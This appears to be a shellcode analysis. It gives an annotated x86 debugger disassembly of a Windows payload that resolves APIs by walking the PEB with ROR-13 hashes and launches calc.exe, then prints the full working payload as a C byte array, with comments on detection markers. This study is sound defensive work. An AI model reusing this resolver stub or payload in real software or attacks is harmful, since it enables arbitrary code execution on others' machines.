00446000 | FC | cld |
00446001 | E8 82000000 | call shellcodeanalyse.446088 |
00446006 | 60 | pushad |
00446007 | 89E5 | mov ebp,esp | upper stack
00446009 | 31C0 | xor eax,eax | eax:unsigned char * buf
0044600B | 64:8B50 30 | mov edx,dword ptr fs:[eax+30] | PEB
0044600F | 8B52 0C | mov edx,dword ptr ds:[edx+C] | DllList
00446012 | 8B52 14 | mov edx,dword ptr ds:[edx+14] | InMemoryOrderModuleList
00446015 | 8B72 28 | mov esi,dword ptr ds:[edx+28] | Full_DLLNAME_Buffer
00446018 | 0FB74A 26 | movzx ecx,word ptr ds:[edx+26] | MaximumLength
0044601C | 31FF | xor edi,edi | edi:___argv
0044601E | AC | lodsb |
0044601F | 3C 61 | cmp al,61 | fold ch to upper case: if ch >= 'a' (0x61) subtract 0x20
00446021 | 7C 02 | jl shellcodeanalyse.446025 |
00446023 | 2C 20 | sub al,20 |
00446025 | C1CF 0D | ror edi,D | rotate the running hash right by 0xD (ROR-13)
00446028 | 01C7 | add edi,eax | edi:___argv, eax:unsigned char * buf
0044602A | E2 F2 | loop shellcodeanalyse.44601E |
0044602C | 52 | push edx | edi:hash of(dll name)
0044602D | 57 | push edi | edi:___argv
0044602E | 8B52 10 | mov edx,dword ptr ds:[edx+10] | dllbase
00446031 | 8B4A 3C | mov ecx,dword ptr ds:[edx+3C] | nt_headers
00446034 | 8B4C11 78 | mov ecx,dword ptr ds:[ecx+edx+78] | export_entry
00446038 | E3 48 | jecxz shellcodeanalyse.446082 | jump if ecx==0, i.e. the module has no export table
0044603A | 01D1 | add ecx,edx | ecx: export_directory
0044603C | 51 | push ecx |
0044603D | 8B59 20 | mov ebx,dword ptr ds:[ecx+20] |
00446040 | 01D3 | add ebx,edx | ebx:address_of_names
00446042 | 8B49 18 | mov ecx,dword ptr ds:[ecx+18] | ecx:number_of_names
00446045 | E3 3A | jecxz shellcodeanalyse.446081 | jump if ecx==0, i.e. no functions are exported by name (also the loop exit once every name has been tried)
00446047 | 49 | dec ecx |
00446048 | 8B348B | mov esi,dword ptr ds:[ebx+ecx*4] | function_name table (relative address, rebased by the add below)
0044604B | 01D6 | add esi,edx | function_name
0044604D | 31FF | xor edi,edi | edi:___argv
0044604F | AC | lodsb |
00446050 | C1CF 0D | ror edi,D | edi:___argv
00446053 | 01C7 | add edi,eax | edi:___argv, eax:unsigned char * buf
00446055 | 38E0 | cmp al,ah |
00446057 | 75 F6 | jne shellcodeanalyse.44604F |
00446059 | 037D F8 | add edi,dword ptr ss:[ebp-8] | edi:hash of(func name)+ hash of(dll name)
0044605C | 3B7D 24 | cmp edi,dword ptr ss:[ebp+24] | if hash_value == target_hash_value
0044605F | 75 E4 | jne shellcodeanalyse.446045 |
00446061 | 58 | pop eax | eax:unsigned char * buf
00446062 | 8B58 24 | mov ebx,dword ptr ds:[eax+24] | eax+24:buf+24
00446065 | 01D3 | add ebx,edx | AddressOfNameOrdinals base
00446067 | 66:8B0C4B | mov cx,word ptr ds:[ebx+ecx*2] | index of function in table
0044606B | 8B58 1C | mov ebx,dword ptr ds:[eax+1C] | eax+1C:buf+1C
0044606E | 01D3 | add ebx,edx | AddressOfFunctions base
00446070 | 8B048B | mov eax,dword ptr ds:[ebx+ecx*4] | eax:unsigned char * buf
00446073 | 01D0 | add eax,edx | RealFunctionAddress
00446075 | 894424 24 | mov dword ptr ss:[esp+24],eax | [esp+24] is the eax slot saved by pushad (two pushes are still outstanding), so the popad below returns the resolved function address in eax
00446079 | 5B | pop ebx |
0044607A | 5B | pop ebx |
0044607B | 61 | popad |
0044607C | 59 | pop ecx |
0044607D | 5A | pop edx | edx:_Tlg_Microsoft_CRTProviderProv
0044607E | 51 | push ecx | return_address
0044607F | FFE0 | jmp eax | eax:unsigned char * buf
00446081 | 5F | pop edi | edi:___argv
00446082 | 5F | pop edi | edi:___argv
00446083 | 5A | pop edx | edx:_Tlg_Microsoft_CRTProviderProv
00446084 | 8B12 | mov edx,dword ptr ds:[edx] | edx:_Tlg_Microsoft_CRTProviderProv
00446086 | EB 8D | jmp shellcodeanalyse.446015 |
00446088 | 5D | pop ebp |
00446089 | 6A 01 | push 1 | uCmdShow = SW_SHOWNORMAL (1)
0044608B | 8D85 B2000000 | lea eax,dword ptr ss:[ebp+B2] | eax:unsigned char * buf
00446091 | 50 | push eax | pointer to the "calc.exe" string (ebp+B2 = 4460B8; ebp holds 446006 from the pop at 446088)
00446092 | 68 318B6F87 | push 876F8B31 | (WinExec hash_value)+(kernel32 hash_value)
00446097 | FFD5 | call ebp | WinExec
00446099 | BB F0B5A256 | mov ebx,56A2B5F0 | (ExitProcess hash_value)+(kernel32 hash_value)
0044609E | 68 A695BD9D | push 9DBD95A6 | (GetVersion hash_value)+(kernel32 hash_value)
004460A3 | FFD5 | call ebp | GetVersion
004460A5 | 3C 06 | cmp al,6 |
004460A7 | 7C 0A | jl shellcodeanalyse.4460B3 | if(GetVersion()<6)
004460A9 | 80FB E0 | cmp bl,E0 |
004460AC | 75 05 | jne shellcodeanalyse.4460B3 |
004460AE | BB 4713726F | mov ebx,6F721347 | OldVersion's(ExitProcess hash_value)
004460B3 | 6A 00 | push 0 |
004460B5 | 53 | push ebx |
004460B6 | FFD5 | call ebp | ExitProcess
004460B8 | 63 | ascii c |
004460B9 | 61 | ascii a |
004460BA | 6C | ascii l |
004460BB | 63 | ascii c |
004460BC | 2E | ascii . |
004460BD | 65 | ascii e |
004460BE | 78 | ascii x |
004460BF | 65 | ascii e |
004460C0 | 00 | ascii \0 |
004460C1 | 00 | ascii \0 |
Original shellcode:
/*
 * Raw bytes of the payload disassembled in the listing above (0x446000-0x4460C1).
 * sizeof buf == 194: 193 encoded bytes plus the string literal's implicit NUL,
 * which is the second "ascii \0" at 4460C1.
 *
 * Layout, as the listing shows it:
 *   446000  cld; call 446088 -> the pop ebp there leaves ebp = 446006, the address
 *           of the resolver stub.
 *   446006  API resolver: pushad; walk PEB -> [+0xC] -> InMemoryOrderModuleList,
 *           ROR-13 hash the upper-cased module name, then each export name, and
 *           compare the sum with the hash argument at [ebp+0x24]. On a match the
 *           export address is stored at [esp+0x24], which at that point is the eax
 *           slot saved by pushad, so popad returns it in eax; the return address is
 *           re-pushed over the hash argument and control continues with jmp eax.
 *   446088  caller: WinExec(ebp+0xB2 = "calc.exe", 1) via hash 876F8B31, GetVersion
 *           via 9DBD95A6, then ExitProcess via 56A2B5F0. The cmp bl,E0 at 4460A9
 *           cannot match because ebx was loaded with 56A2B5F0 (bl == 0xF0), so the
 *           alternate hash 6F721347 at 4460AE is unreachable in this particular
 *           payload.
 *   4460B8  "calc.exe\0" string data.
 *
 * NOTE(review): the "eax:unsigned char * buf", "edi:___argv" and similar register
 * annotations in the listing look like debugger auto-labels from the host process
 * rather than part of the analysis. From a detection standpoint, the four hash
 * constants and the fixed PEB-walk / ROR-13 prologue bytes are stable, searchable
 * markers of this resolver stub.
 */
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";